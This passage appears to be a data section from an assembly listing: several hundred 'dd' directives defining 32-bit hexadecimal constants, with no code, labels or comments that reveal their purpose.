dd 4FFCC6E3h, 0BFDF2D4h, 5FBAD275h, 0EE84FECh, 0E8509F2Eh
dd 0E028EBF1h, 8A321BDBh, 8ACCD179h, 0EB976DCDh, 9B9CC066h
dd 6B80892Bh, 0E1DA23F4h, 0E0DFD15Ch, 0DCB7F80h, 57AFC3BEh
dd 6EB58773h, 5A5FA851h, 0A89B2104h, 0CEDA1670h, 29198E0Fh
dd 2E21879Bh, 0ADB14146h, 437A53A7h, 2A417BA5h, 0B630C4B8h
dd 7D787E34h, 0F0CED5D4h, 0C5313589h, 7D9C1273h, 0FB339FAAh
dd 27728EEBh, 6658CC5Dh, 4F710252h, 0D66CA3D5h, 0E4E8F757h
dd 63239962h, 0D1A9DC7Ch, 78FE88E7h, 0A6C11DF3h, 4043F0Dh
dd 7B75BE48h, 5A9FA7C8h, 95E38AFDh, 19672F8Eh, 0B8EC3B97h
dd 1A41F088h, 0DAE8C6EBh, 31F698F0h, 9BF094DFh, 0ADD46538h
dd 53F0F735h, 0EEC22ADEh, 472E4798h, 0BD17E76Eh, 389D5C31h
dd 7FF59A99h, 9EC5830Dh, 4E76A373h, 70351D0Ch, 47115A4Dh
dd 32334AF3h, 85B4CA76h, 962A6A95h, 223AE209h, 51025BA7h
dd 9974BA9Fh, 65F51F66h, 0A781E699h, 7352CCECh, 7DFB9F45h
dd 65CA07CDh, 0B46F7AAAh, 1736EB32h, 2E1F0A3Eh, 358D967h
dd 0A3A9639Eh, 0C44BF821h, 167CE43Ch, 12263D9Ch, 8D381E70h
dd 0F9E51CC8h, 0C9C46F74h, 8D55816Fh, 86E6E454h, 313C19EDh
dd 0E777CAD2h, 61A9BD99h, 0DA892111h, 0A4DE1DCh, 0E9025761h
dd 5087E226h, 0F287824Eh, 7CA7993Ah, 0EB17E3F5h, 76107952h
dd 91D93DDAh, 0A8B85C23h, 84572E51h, 0B1DB0DF0h, 3907C0F5h
dd 6916FF0Dh, 0D1CCCA5Eh, 0AE74D62Eh, 0E3C1D3D4h, 466606E3h
dd 32572900h, 61D89DAEh, 9BC9B9FDh, 0DA2BFE83h, 4BF93A2Bh
dd 0DE871C21h, 1C3EB1B0h, 5EDD3C0Eh, 2A568E9Eh, 9FB33C55h
dd 0CD02BDDFh, 0DFAD9963h, 0C99CE0C7h, 77DD987Bh, 0E6350495h
dd 0D5B8CA94h, 42A7C298h, 0FF444BD3h, 67F3D397h, 36E74DD4h
dd 99F00C54h, 15C586DCh, 6DD7F0A1h, 486C2D4Ah, 56DB79F0h
dd 3EF93517h, 4F0F8DBBh, 0D597E622h, 3011DA4Dh, 66A4B069h
dd 8EC14206h, 6BBF65B4h, 54F0164Dh, 0CAB381AFh, 0E2C6572Ah
dd 882D38BCh, 0ED13D573h, 0CDA92E9Fh, 1E63BB5Ah, 2D68E8D3h
dd 463EA1BFh, 183C2E8Bh, 0D8AE45F2h, 0E455557Eh, 0D98B4297h
dd 0D0B0735Eh, 0D35114CAh, 223534B4h, 10F1ACB6h, 63A69404h
dd 0B714D3B8h, 91AF9A6h, 54F827A3h, 58DBBEA6h, 3E05168Eh
dd 64355BDh, 58CD3433h, 0F3961AA8h, 0BBCE38B0h, 0FC7C53BCh
dd 0A5436C62h, 0FC1F7C73h, 0EE56714Ch, 0EAF2D6C1h, 0AB0BA332h
dd 60F81059h, 0D937D456h, 81370FB6h, 0E0F1615Fh, 7E07B09Dh
dd 9ED00739h, 4C71CE93h, 0C07461BEh, 8E3D151Bh, 0FBDEB44Ah
dd 0A5D9BCACh, 2D7C4EBEh, 9B93B32Ah, 0B86D9B87h, 0EE330BA7h
dd 50B024FFh, 6A9E991Eh, 576D28F0h, 386235EAh, 691E82B7h
dd 0D0BEBA55h, 4C370785h, 1787E24Bh, 0CB975B0Eh, 9052E87Fh
dd 0B2FF8DD1h, 8D3AECD7h, 4D780AE1h, 9146D5F8h, 0AA0BB6DEh
dd 1DCBCF38h, 43918CE7h, 0AA345FCBh, 32F6E925h, 34AD8363h
dd 22F53505h, 6BFCE52Dh, 0EE59C2B9h, 7C79BAB6h, 592496Eh
dd 47731B54h, 0BDA5341Fh, 468A0DD2h, 96349B64h, 0BFCD009Fh
dd 0A4D5ED1h, 3095623Dh, 95F0948Dh, 0C960C756h, 7A3679FFh
dd 45260753h, 9F341DC2h, 0EFEDED8Bh, 5DD45D6Ah, 9BC70068h
dd 0A4CFA46h, 62168964h, 0ECDABACh, 0C14CB03h, 0C5D44969h
dd 34D52D48h, 0C77F07C7h, 0B47B7162h, 0A7D7BB02h, 41A6B36h
dd 0FBA9B24Ch, 60F67922h, 95C441D5h, 991ACDC4h, 15F042Fh
dd 0F2B71E6h, 0B7C8D5C6h, 0DB676E5Ch, 0A22A97B2h, 0BE57569Fh
dd 45F396C7h, 579F3BE7h, 42458137h, 7DBCB447h, 6742CFA3h
dd 93A1DDEFh, 64B04FA8h, 28DC7A92h, 35162F68h, 0B3C521B6h
dd 6C4C6783h, 0E0582129h, 7C9C1CF3h, 0B742542h, 5C4FAF1Ch
dd 0E506DB01h, 38E78185h, 9514F491h, 8D713220h, 0E98EBFC0h
dd 0C3FF2565h, 0AEBBA770h, 55C5EB60h, 35FAF66h, 783C8ECh
dd 0F8F2F8B8h, 4E72D1E1h, 0D98EFF9Fh, 96A08989h, 0D576398Bh
dd 92375374h, 6E72FDE0h, 96B98DEEh, 80A17D7Ah, 0E0D3D591h
dd 62BA158Fh, 0FB59851h, 3320E7C1h, 9B77350Fh, 9403F465h
dd 0D2FC2A5Dh, 0A2AA0E4Ah, 319D79CEh, 5654F8E2h, 8F3BE65h
dd 0C3092FBCh, 5109AD0Bh, 6DB26FE1h, 5343F012h, 65FBBCA8h
dd 556B0B84h, 4D47D337h, 31957F2Dh, 0C85FAA47h, 0DFC3CA8Ah
dd 0F1CFE37Eh, 6EC4CD58h, 0F5D56D11h, 57C4C6CEh, 0DB38633Dh
dd 0F728AF71h, 2634BD58h, 93E84282h, 8389830Eh, 4129E975h
dd 0A86AF47Ch, 5B319729h, 3BC74D81h, 0E366B3B1h, 6C1B85C0h
dd 0FE77393Ah, 244250F1h, 12FCEEC0h, 570902C0h, 0FAAEF76Ch
dd 0D730BFEAh, 67AAB878h, 0C1173917h, 7DEDF500h, 0F6DBE75Eh
dd 8B45D6F7h, 6041CB46h, 148DCAADh, 0D11AA946h, 0E1AE35B1h
dd 782D31F7h, 9A9BB770h, 46A7C51Dh, 633AD1BCh, 0C0FFBDAEh
dd 79157CE7h, 0EAF4A665h, 0D188DAD6h, 317B0Dh, 0D6742175h
dd 32DE0F0Eh, 2A043C7Ch, 4607BF68h, 87EAAA8Bh, 3D17CC9Eh
dd 476D3BE4h, 26FBF8Dh, 0C1E7C284h, 4B0FC358h, 792D1DA9h
dd 3702A8A9h, 0D25A6E3Ah, 0FF537459h, 0B200AF1h, 5D1522AEh
dd 0E4ADD3D5h, 0B6627C56h, 3C15D287h, 154BA470h, 46DB25CEh
dd 893FCF57h, 83A2E732h, 7B37D688h, 16CBC3FDh, 128F7613h
dd 4574B2A8h, 2E5F3B78h, 9320BB44h, 0E7A97646h, 1A5C87EBh
dd 67F4A7A3h, 0EC2C5B71h, 9A6E41A8h, 90BC85B5h, 0EA2275DAh
dd 368D32F5h, 3B89EF02h, 2D1AD0E2h, 8DE15722h, 0A9E38F37h
dd 0C2C8ED2Bh, 13B5559Dh, 51B8F4F5h, 77D78EE1h, 7E4F8BB3h
dd 0F89497F8h, 0C934FC7Bh, 0B2CD659Ah, 0C5ABDEBCh, 0A12AD1B9h
dd 0D9BFBBF6h, 92613074h, 2551172Fh, 46867F67h, 3469F3F5h
dd 90917415h, 0C146C758h, 0C192FD73h, 43EFC589h, 47AEEE91h
dd 172A9581h, 0ECE8AA11h, 0B91FDF81h, 0D490CDECh, 0A08BDDE8h
dd 915A291h, 0BCA0DA47h, 76A588ACh, 54C6B253h, 8C51B25h
dd 23BD4AE2h, 0D6075342h, 84FC4263h, 3CAAF62h, 0F091F0BDh
dd 31B5587Ch, 8CDD1051h, 508C673Bh, 8D2085F8h, 81113ABFh
dd 0BFB7BC07h, 34DD22E0h, 1B5CF5D8h, 455326A6h, 0AE29D8CBh
dd 5CCDEDDBh, 0CDFD6DF4h, 0D1168B59h, 10F0E2FDh, 0DFF51053h
dd 3B803B13h, 74A2B13Bh, 0C0B5B1D6h, 129D4621h, 0F88CFFE1h
dd 75081945h, 229789F7h, 5C815711h, 31C6D155h, 0E874CBC3h
dd 0F1363FC8h, 105A2173h
dd 0EEBC0D72h, 949EFF3Dh, 0F5B51FCBh, 0F1577ABDh, 3F76FE1Bh
dd 0AE065A8Dh, 0D1ED3E26h, 2CFC953Bh, 6FDA6DE2h, 8007F9D7h
dd 111B7F8Ah, 5F6F22DEh, 0D7572B81h, 0C9CE6C96h, 3424DA7Ah
dd 0D5B1D6C2h, 0BC778D47h, 810B412Ah, 0B67EBCD0h, 2962B98Ah
dd 461FF72Eh, 0F397F069h, 2F7F2A84h, 0E0A71D2h, 32F81DEDh
dd 0F5342381h, 95EE1677h, 0B52FB623h, 131801DFh, 6D99C0CBh
dd 9D4B5DC8h, 0CB3F18A4h, 615D58D5h, 9EBFB6C0h, 0CDDCAFB5h
dd 697BC7BAh, 0F6A4E0B4h, 8B41D63h, 0A4EB5A2Ah, 0F1AAE0D6h
dd 0C077749h, 96E417F4h, 650ADB75h, 6175F770h, 79A27304h
dd 69A2ACDDh, 5A3C5E07h, 5CCB6E48h, 0A1673662h, 255B572Ah
dd 0D1758CEFh, 8707D052h, 89F85E37h, 8EE221F8h, 7AB7E51Bh
dd 54A57CBh, 9CE6EE54h, 89CEA6BCh, 57A7951h, 6EC40EAh
dd 0F3B579B6h, 0B5E6B476h, 0DE0B3E7h, 7CCB7E15h, 3AB5A369h
dd 0E3F84296h, 0DC29BE1Dh, 0BB9C9502h, 0E168B9CDh, 76175573h
dd 0C2756B4Ah, 37E990D1h, 5BEC8EF3h, 7BD924ACh, 3B4C3C29h
dd 2EBEF338h, 97EE3CD6h, 666FC8Dh, 0A0A03E9Ah, 0C34DD68Ch
dd 0BF720D75h, 41D0D44h, 72B31CF0h, 15EF7192h, 0C6F5A17Eh
dd 8839A98Ah, 0FF758708h, 0D9EF608Bh, 69CB54F3h, 968ED41Eh
dd 68757497h, 0BBFD87C9h, 0C9FD0F11h, 6E3A3781h, 0E095ABFCh
dd 0A76AA900h, 0D849EBE9h, 4E4BF2D1h, 0B397F1Fh, 0EE6DACFFh
dd 17F5EAF9h, 0D5DC717Fh, 9FB6D591h, 96C0FBA1h, 3978334h
dd 3177EAB7h, 0F366B8EAh, 6796A29Ah, 2F129AE9h, 80EECDFFh
dd 4AEC3898h, 0FA170797h, 1776844Ch, 1F0250ECh, 0FED61570h
dd 22A9A818h, 95BD180Ah, 0D67EB0FCh, 6C4692D9h, 0DF9C860h
dd 7FB52CFEh, 0A97076FBh, 0E6858323h, 6275A8B2h, 0D17BB8BAh
dd 6034D386h, 72078A02h, 0FCCF9B03h, 0D6A7E92Dh, 9BD4B612h
dd 339DDF8Ch, 0D60850C7h, 69E83B31h, 0FC557E0h, 6F85B16Fh
dd 0C54ED1DFh, 93712DCDh, 0C69C0835h, 5B824A1Dh, 81373AE7h
dd 537A4DBCh, 68AC1B8Bh, 12677A60h, 7FE52D35h, 362C4BC5h
dd 8AA0D12Fh, 5C1E12F4h, 5168B31Ch, 544FBB31h, 0D359DF5Ch
dd 0E551AABBh, 55974C66h, 8CAC8180h, 93732781h, 0F8D8615Ah
dd 4A697E4Dh, 88E4DECAh, 2B072625h, 0BEC873EDh, 1BD8A261h
dd 782864DAh, 8C5A277Eh, 46AB6E9Dh, 3C0F4F72h, 71806FE0h
dd 34E2E552h, 2FB5A0FBh, 0B98AAD76h, 8527D05Bh, 6DCC1972h
dd 1D987E13h, 0E31D70B1h, 0A7AB6156h, 555192A1h, 0F2F03CD9h
dd 0CF83AB31h, 9DBF27C4h, 0B8F2BE34h, 0CF9D81E9h, 0CA7A99CBh
dd 5978361Ah, 9F822B1h, 327F41A6h, 0D5B47F46h, 0D475E0CCh
dd 0D27F40D1h, 65C81377h, 0D783DFEAh, 54E7C8FBh, 0DB0F5Ch
dd 3F19F3F5h, 102D0C9h, 73A2AEE4h, 0E9E3C1FDh, 2E3BE533h
dd 0D3C7E55h, 6F42D1C1h, 0E2350B63h, 30A6FE5Bh, 4B0D6CFFh
dd 0AA1AD148h, 0B3218B9Eh, 555076E9h, 1F5841B8h, 0D6B6BB25h
dd 7CE97C2Dh, 0D4183337h, 1F22BB33h, 13EC147Eh, 4F03F52Eh
dd 95758FA2h, 65F05AE9h, 5670AF2Ah, 5989DB49h, 277A6ABBh
dd 0BD5DEA3h, 0AC726A29h, 42FF5BB0h, 61E5581Fh, 0AFCB2D7Eh
dd 0AE37D10Ah, 0DB43E28Fh, 25F094Fh, 0B396B16Bh, 61A58D46h
dd 6115F1B1h, 0A718599Fh, 294D7287h, 7BC651C0h, 0D6B51DDDh
dd 15005A92h, 0A8E629A6h, 7D048FF1h, 0FB5579B3h, 0B91CD0CBh
dd 0D26A8E60h, 0AB4AAE17h, 278F200Bh, 18FEEA35h, 92CB9C10h
dd 69F02267h, 7828DF6Dh, 7BB98A6Eh, 0AAB01776h, 0D4C69F48h
dd 0B2B56CEBh, 0D2F712B3h, 0B82D037Dh, 26B20B10h, 93ABA43Bh
dd 6C36A083h, 0CDF6B538h, 46312E26h, 0EA4723BEh, 4FB65A0Fh
dd 0FC4F979h, 40410B82h, 0FD9EA516h, 202122C1h, 0CE3B7B7Ch
dd 12ADB145h, 50194ADFh, 0F875F79Ah, 55F29256h, 826B47D3h
dd 0CD84DCCh, 933EE00Bh, 54ED143Fh, 64E37EBAh, 181FCBBEh
dd 37205F87h, 45B25294h, 474C479Eh, 56AE6ECAh, 9AD74E74h
dd 0EE3CD32Ch, 0A86DE0FFh, 2A6F9171h, 715FC496h, 0DAD5EB18h
dd 3557BB83h, 80D173E9h, 0F7A16D76h, 0D97A284Eh, 0FE27EBACh
dd 36010DC6h, 5ABAC805h, 4D1AC8AFh, 365AF3A9h, 7AA54F44h
dd 4ECF1652h, 415987E3h, 7416C083h, 0E3EFAAE3h, 298ACDCFh
dd 0ABFD1378h, 1279CF5Fh, 2304FD98h, 0CA3810FCh, 1E9E8011h
dd 181E09ECh, 3FDA559Ah, 5984B451h, 0B32D14DCh, 3C00DAFBh
dd 66A95424h, 7A17F2CEh, 741B4571h, 74A21C46h, 0EE5E5A60h
dd 0C948C5BFh, 0D1557DE1h, 4B92F344h, 7BFEC70h, 56FF17C1h
dd 5BD9F187h, 0E0283E15h, 8DAFF39h, 5F4BD6B1h, 0CE15B3AFh
dd 0C2AB8029h, 0EBB3C4D6h, 0DFA9CEF7h, 28A8AF0Dh, 0C607AC57h
dd 0A349E643h, 0F1F7DB10h, 0B3E9EEF0h, 0B2F18D9Dh, 96A167D1h
dd 0AA9427E7h, 0DD6454C6h, 6B078852h, 0F97B87D9h, 691D2CB3h
dd 154C38AFh, 0CA2D8B77h, 3E6D3463h, 3E88573h, 0F6FAD2FEh
dd 81F6EC9h, 920F4530h, 316D756h, 104B45CFh, 0D3363575h
dd 0B15A58B0h, 5270F5C8h, 0FFCF01Dh, 995A61Dh, 0B790E079h
dd 774CA546h, 0F6A511DEh, 82F8F089h, 52EBAEF8h, 0A6CA6116h
dd 8F2FEB8Dh, 8E5C1120h, 0FAC972F2h, 54695C6Fh, 29F9CE87h
dd 701F562Ah, 3FCEA1DDh, 0ACA25C68h, 4ABA17D9h, 37749220h
dd 781FC746h, 7371A6A5h, 33F73849h, 63FA0D38h, 4597BA5Bh
dd 41E37DBAh, 2BDAAE2Ah, 0B51AC6EBh, 35904185h, 0FBFBDD35h
dd 0F1DBDEB8h, 64F03EB0h, 7C80A846h, 40FEFD8Bh, 34F766B2h
dd 0C185A1D1h, 82FF358Eh, 398B94ACh, 3504B622h, 0A81BBA03h
dd 602A696Eh, 1A64A1F9h, 0CB89367Ah, 2AA0B295h, 0BFADA2FBh
dd 735299A7h, 7EC55A1Dh, 0A116882Dh, 5811F197h, 0F524CC2Bh
dd 8563771Eh, 7EC4F554h, 56B2F860h, 79C1DE15h, 5EA43013h
dd 44C3DFC0h, 35B9A4A5h, 99F040DCh, 31550F1Ah, 0A1605429h
dd 0B1705E27h, 85D1E9BAh, 0D5D05FF4h, 7E1B9931h, 3A76894Ch
dd 0FB9CB471h, 0FD2A56F0h, 504529C1h, 72785C2Ch, 0AD334EAFh
dd 3EDAAF3Ch, 0CC08A701h, 2A025014h, 0E620F742h, 28AE9046h
dd 40FC6045h, 5D2049C4h, 53EA0254h, 26B8EE13h, 1C7C463Ch
dd 0C09EE709h, 982329D0h, 260477A0h, 28BF5818h, 617A10C0h
dd 8F4053E5h, 0A43E6205h, 4604D4A0h, 27F70A02h, 99205223h
dd 0E50614F0h, 40586090h, 33A3CB60h, 6F3106A3h, 2684634h
dd 9E3602A2h, 82AD0A51h, 3020960h, 56608E2h, 2CF1F2CEh
dd 0AA3B0F5h, 0DB4BE99Fh, 4A9598B4h, 29C1EA38h, 10BFCD08h
dd 0A8D19BA9h, 2823027h, 0B8A003BAh, 38F8AF30h, 0A29C2734h
dd 1F1E805Dh, 21CC09EEh, 2880BE90h, 272831BDh, 3D188345h
dd 0D1D4638h, 0F4509351h, 4C4D518Eh, 34618D18h, 0A150CB1Ah
dd 7CC81AA1h, 54DE62C7h, 45FC28CEh, 0D3F055C4h, 0A0C4240Ch
dd 217EA35Fh, 6C1FF183h, 2D4BE145h, 0DCDA6B22h, 3ADAB672h
dd 6F2BC6D9h, 0A655CC89h, 6B1A9F85h, 6F620EDCh, 83AECFD2h
dd 0FA40D11Bh, 0BE1125Ah, 0FC60B523h, 15DC50Bh, 86BB939Ah
dd 26EFF75h, 5EC4995Dh, 0A33BBCFDh, 2D12BC3Ah, 0E2F23F86h
dd 75C5578Ah, 0AAFAED5Bh, 0A60E7B60h, 55F01531h, 0F1E469FEh
dd 48E60DFFh, 0AFC740C9h, 0F620BB55h, 0AC0F0F81h, 8CD3FD9h
dd 301260F9h, 1107F2E9h, 80E7ECEDh, 0E27C2041h, 0C1AABB2Bh
dd 0E9F38558h, 5AF23E91h, 0D767EF3Ch, 0D203A5A5h, 0D6E86E93h
dd 0E0355E8Ah, 0EE9683BEh
dd 18788425h, 7F3949BDh, 0C46FEE7Bh, 0B81F0F03h, 0F2CBF770h
dd 1E37E9B4h, 7DA5580Bh, 6B8BA125h, 473781F8h, 58BA93CBh
dd 8AF83F6Fh, 0E0938DA2h, 16895AA9h, 0EDC1BC2h, 8288D935h
dd 0A8C634B7h, 31F6C2B0h, 7A1AB86Eh, 0F5F84951h, 75981E54h
dd 0AEDD2E84h, 40F90EE8h, 0E4D3486Eh, 0C68EEF3Ah, 9A4C8D28h
dd 0D17F511Bh, 1CEA2812h, 3CCE32AFh, 981615DEh, 21AC2FE1h
dd 4D64A300h, 0ACDF44BFh, 9869E4C0h, 4E25C0EBh, 54C325D0h
dd 0C143F119h, 0A8D371CBh, 0F810D688h, 9ABACC29h, 0CAD5842Ch
dd 0E6F4AE28h, 0B6AB2D50h, 7F3FB1D4h, 0BBAEBAE3h, 34DFE3FCh
dd 689D3F07h, 0DFA123ECh, 26E6344h, 0BF5771BAh, 32658674h
dd 8C7AECDFh, 0C7A2ABF4h, 0BD5A0BF2h, 3E553E64h, 4555427Eh
dd 0B2799DE5h, 0D1BF486Dh, 0AB4BD244h, 0C9F7A69Ah, 9A81D7C4h
dd 0DBADB707h, 9FC7D405h, 6E36E0D0h, 864E6810h, 40789B77h
dd 0BDD7E09Ah, 0D5586376h, 0B065CAF7h, 5FF1C53Fh, 488AA465h
dd 54A8EEA9h, 34692F95h, 0FF3090F2h, 6291A2AAh, 979DBAB1h
dd 23989B6Ch, 3F1FE36Eh, 0EA27FBDFh, 0DF3B310Ch, 3DA2E04Eh
dd 617D4A9Eh, 0FF87F570h, 0F80ACD29h, 4F945596h, 0D01C1926h
dd 0ABCDA6F5h, 5F111AA1h, 511152B5h, 75AB238Bh, 0F95BC043h
dd 969D2FC4h, 493E82C4h, 0F1AA16E6h, 0F38E2654h, 0A98A54C9h
dd 780ADD64h, 6B33E016h, 0E63945D7h, 0EDD1D43Ah, 31D21E62h
dd 378F7073h, 572B42Bh, 0A9C2501Fh, 0DBC19461h, 4F7C5DBBh
dd 0BEE82BDh, 7075AF5Bh, 17265F40h, 484A350h, 37568BD1h
dd 4F84D575h, 4174E0F0h, 0E0D81FDDh, 4FC3CFF6h, 832F60F2h
dd 0FE3C22B8h, 0EAA54F7Ch, 8D682733h, 0EC80F666h, 7DDFBF0h
dd 0F9131BA4h, 0F00D75FFh, 0AC5C6407h, 75939879h, 9FAC7C56h
dd 0F77F45BDh, 93D05FF7h, 0C8BCAF87h, 0B1A3B07Bh, 1C19F80Eh
dd 0F803D6F0h, 0C575F7B0h, 9B319046h, 0CF46B0FCh, 7576F4CBh
dd 50216F65h, 0A105FEF4h, 0AE4673h, 0F7E9E07Ah, 0D738DF41h
dd 0CBEBF5BCh, 5B1655A9h, 0DB5EE649h, 0F858D5ADh, 111FE88Dh
dd 0CFB9AAFDh, 42957A85h, 7DBE6C17h, 1DCF3AA9h, 3B7D2E69h
dd 0CC721EAAh, 9402ABCCh, 4CF2942h, 75698492h, 8C171E2Ah
dd 96F67816h, 0B7196A5Eh, 0CD567303h, 0CEF7FDADh, 8AA54D67h
dd 0CA3C468Fh, 0D6C0A214h, 7F290091h, 0A040D2D9h, 6417E109h
dd 7F949B6Bh, 57879A2Ch, 0FA20B7CFh, 0BD816FE2h, 45C8D9B5h
dd 0AA66EBCAh, 0BF161F6Ch, 16DB357Dh, 919A5D03h, 69AEEF83h
dd 0C884810Dh, 2EDD23F7h, 607CBBACh, 1725564Ch, 0AC58C759h
dd 2C7B2DB2h, 3854B2F2h, 15FCD7h, 0D2B0CE2Ah, 0D3B34043h
dd 0D1C40F67h, 0B1A05BC0h, 0AE0D8695h, 54A8B235h, 3CEBCC53h
dd 0BD6401AFh, 0EFC91BF5h, 607CD9F9h, 161220A4h, 0E95851DFh
dd 286AE31Dh, 0A1C5C3F1h, 3EBBA3D2h, 3CE968Eh, 75C38DFEh
dd 0DA193C5Eh, 0C7500C51h, 2CE2EE4Bh, 0FE2F9DEAh, 86781277h
dd 97752BCAh, 0DC35099Ah, 0BD9E80E9h, 0F2976FF2h, 0D6898CF9h
dd 44B6CAD8h, 6A4BB983h, 8DF57234h, 0AEE00338h, 4801CD8Fh
dd 26EB9E55h, 0D2C438F3h, 0A9644F82h, 4FDF81ECh, 70ECDB4Fh
dd 92BCD34Eh, 0F0E6EBC7h, 0FC31D8DCh, 84F973FEh, 88378891h
dd 7E0F64B9h, 3B917FCCh, 4A5FC407h, 0EBB5CC3Ah, 211DA592h
dd 1BCF7851h, 2915E028h, 547F3B15h, 0B32DFF0Fh, 83C0843Bh
dd 0F4D63D65h, 4A1FC8C4h, 0D8D0AEF1h, 95DE7D6Ch, 0DF2DBA4Ch
dd 0E5BD1B9Dh, 0C453F92Dh, 1749EC67h, 0BE5491h, 0EFB9480Ah
dd 8999D4A4h, 0C275A08h, 5F6E83Bh, 0BD9C7533h, 0FC5B336Dh
dd 17084C72h, 4406134Fh, 0FC1F5E5Fh, 0E1FDC8F7h, 34CE7DD7h
dd 3333CFB6h, 2C28A91Dh, 355A7A50h, 0B12E7FAFh, 0B0104204h
dd 12EB7757h, 70691A99h, 14E4319Ch, 4EB01000h, 0C69E562Bh
dd 7542A101h, 8FA2817Eh, 0A333875Dh, 14ADFFDDh, 5CB622B8h
dd 95D64AECh, 0DEDAAB68h, 0A3DC00BFh, 57EB1BCDh, 3576F70Bh
dd 519C9F79h, 0E0EF26h, 0B9A2B9EBh, 14113751h, 5E7C0B13h
dd 1B47839h, 1279AC7h, 0AFCD8878h, 0B08217A8h, 0A1C37540h
dd 16F5F929h, 0EADD11ECh, 9FDEA8FBh, 18590BF5h, 46D12582h
dd 0D88DE2E4h, 7BAA7F38h, 1F709695h, 24FC921h, 4DE1D9FEh
dd 3AEAAF07h, 0D4FB67D7h, 0FE5B7118h, 89B4A7F2h, 0DDC5D3A9h
dd 7AE317F4h, 40F85409h, 8A056037h, 0B9CAEA8Bh, 29ECEC35h
dd 0C9FBD93Fh, 8D59EB03h, 0F7A60BCh, 0D4F54071h, 93E4292Ah
dd 0DCC26083h, 0A6F5014Fh, 7DD4EBB4h, 5D7068D1h, 0C315DE27h
dd 0D27D0215h, 882E2339h, 155753C6h, 0A0490D2Ch, 9E5E34DCh
dd 8F9259E9h, 0DBEA2B38h, 0AEF3E300h, 0AD2350B6h, 0CD6CE1C0h
dd 0FB581FADh, 2F84AFE0h, 0ADAD9BE2h, 0FEF13FD3h, 0BA1B247Eh
dd 0A411B8AAh, 258FBC8h, 0ACDB18Eh, 4C568BE7h, 7D1FCA2h
dd 6DF70BF9h, 0C41CF770h, 1F5AD5B2h, 8ABC4E9Fh, 791DDE31h
dd 2E55FA38h, 0D66A3A53h, 54276BBEh, 0ADD1B49h, 9EF3C392h
dd 97462BFDh, 0D902081Ah, 0B1FD52F0h, 2E70B796h, 0DF5EC0F1h
dd 0A51BF90Fh, 0CD43136Fh, 567F285Ah, 0FB81F8D9h, 64EBA1E0h
dd 62B71404h, 7EEEE663h, 16B47238h, 0BA6980BEh, 7C325E2Dh
dd 25015858h, 0EC7F5452h, 4DA55ED1h, 0B3FC4072h, 0B9E8CEh
dd 0F96EFB67h, 80FFDE6h, 0E20BB83Ch, 0E44FF6D2h, 49E67720h
dd 52A6FE41h, 3022F5EEh, 0EBA512CAh, 0FB258D94h, 96F904CDh
dd 0C85B60BAh, 89C8AE86h, 19689BBAh, 0DB6C5340h, 11597F0Bh
dd 0CDD721E1h, 294114CFh, 34B9F189h, 0F47EB415h, 765C1419h
dd 40A2F6ABh, 5814E887h, 0C7439DA8h, 5A3104AFh, 0FBC5B54Ch
dd 0B5F74D5Ch, 7AEAE13Dh, 0BA9C0B36h, 7C5529Eh, 0F1B1A5F8h
dd 5C5B199Bh, 797F9573h, 0E1FABD81h, 86021B9Ah, 0B5E75E25h
dd 0B7D68EA6h, 6C70E770h, 487E1BDDh, 156F36DBh, 629B3893h
dd 75EC72A6h, 0DA37BCDBh, 0D6B783C0h, 8AB7D18Ch, 0D279EE0Eh
dd 0BD0284Ch, 0D6021136h, 0C3B4EA5h, 0D68A9618h, 0BAD4554Dh
dd 0D455B875h, 6FBF5D41h, 53F9A0CDh, 9D846EAEh, 3B17DCAEh
dd 0C7F1E102h, 0EBC98212h, 8743EB77h, 59FBF16Bh, 15DC7D99h
dd 2B6EE5B1h, 0A5224E38h, 6394137h, 0FA2E65D8h, 4896B17Eh
dd 16822B3h, 15F471F4h, 80F6B83Ch, 282824ECh, 7F464947h
dd 0DFDBAAD9h, 5FC3A711h, 0BF57DAD1h, 0BF9A4039h, 0EE48066Ah
dd 0D5D787E2h, 3ED1F56Dh, 0C4FD3857h, 5A29A1D9h, 0EDFF7B9h
dd 0FF575222h, 0B2CADF4Fh, 0A2BDA6Fh, 16AC5178h, 3C55F912h
dd 0C0EB2FFCh, 7C98E3E9h, 0A9F0FC05h, 0CDF69E17h, 5415657Dh
dd 0B858FBB9h, 3A76259Fh, 0CCFA50B5h, 0FC895F6h, 53A281F5h
dd 546C28F0h, 7CA62DEDh, 1AB66E0Dh, 55D8CAD6h, 4639DABFh
dd 0DE9618B2h, 6115F163h, 3A0ABD9Fh, 43F05620h, 742513F7h
dd 28644D7Fh, 16CA437Ch, 90E024A2h, 5E28F185h, 7CD54D1Eh
dd 903972F3h, 93BD85F5h, 2010C55Ah, 0D15FD977h, 5DAC2F2Fh
dd 7A4A565Eh, 0BBF5DB68h, 1DA4EE89h, 20DCD75Bh, 69742B41h
dd 0D43990F9h, 0CAB8CE28h, 249E0AA9h, 7F5AE051h, 689DD53Eh
dd 0F30D5CEh, 146FEF81h, 33A1C379h, 7A01BB9Bh, 0E0DA2670h
dd 7A7719C2h, 0C8C9BB4Fh, 1F0B8077h, 354DF96Bh, 8F4D7F89h
dd 0CC3D3EF4h, 0BBC8817h, 0DEEBF8C4h, 0D555AE22h, 9E55FE66h
dd 67276AEAh, 0F9548ABAh, 58D919CBh, 0CA6802B4h, 19561380h
dd 8B5FD14h, 3F1F557Bh
dd 51AA583Fh, 0BF595739h, 0D1D9FEE2h, 5461F85Ah, 66C543A6h
dd 0DC6F5727h, 0EA82BB5Eh, 0E5A2616Dh, 5189A79Bh, 0A1DCD04Eh
dd 621574B5h, 0ABD48960h, 0FBC3F1B9h, 276C1165h, 90999E4Ch
dd 5CAFD653h, 0E59CE455h, 76373C13h, 3FA4BF1Eh, 0FF1D18DEh
dd 0E6116654h, 0D7E1A0BFh, 84B99128h, 7E32956Eh, 1E3CCE39h
dd 0FF121BA1h, 5559849Fh, 0C8A46B90h, 97D1AFCFh, 0EE07C5AFh
dd 0C84C7D45h, 0C9F76475h, 9C617E14h, 52F18BF6h, 2E3E3766h
dd 0FFC1F039h, 4968AF4Ah, 0AE24D6BDh, 5A092EBh, 0D7A9B397h
dd 43F13B58h, 0EABED969h, 53531493h, 6361A96Dh, 0F2AF8E7h
dd 5C78EBADh, 30DDB75Ah, 5B2997AEh, 1BFA19CDh, 749D5E20h
dd 0AF4ED70h, 0FC25B15Dh, 2D675E94h, 5301B246h, 0FC711BFDh
dd 0AD1962A3h, 2F48E768h, 55F16A57h, 0C6854A1Eh, 450726Eh
dd 0A21DFEB6h, 3AE2C340h, 0D0A46F13h, 317260EAh, 88BFC98Dh
dd 83F041C2h, 0B7E5864Bh, 0E3997E5Bh, 46AD217Ah, 8117E44Dh
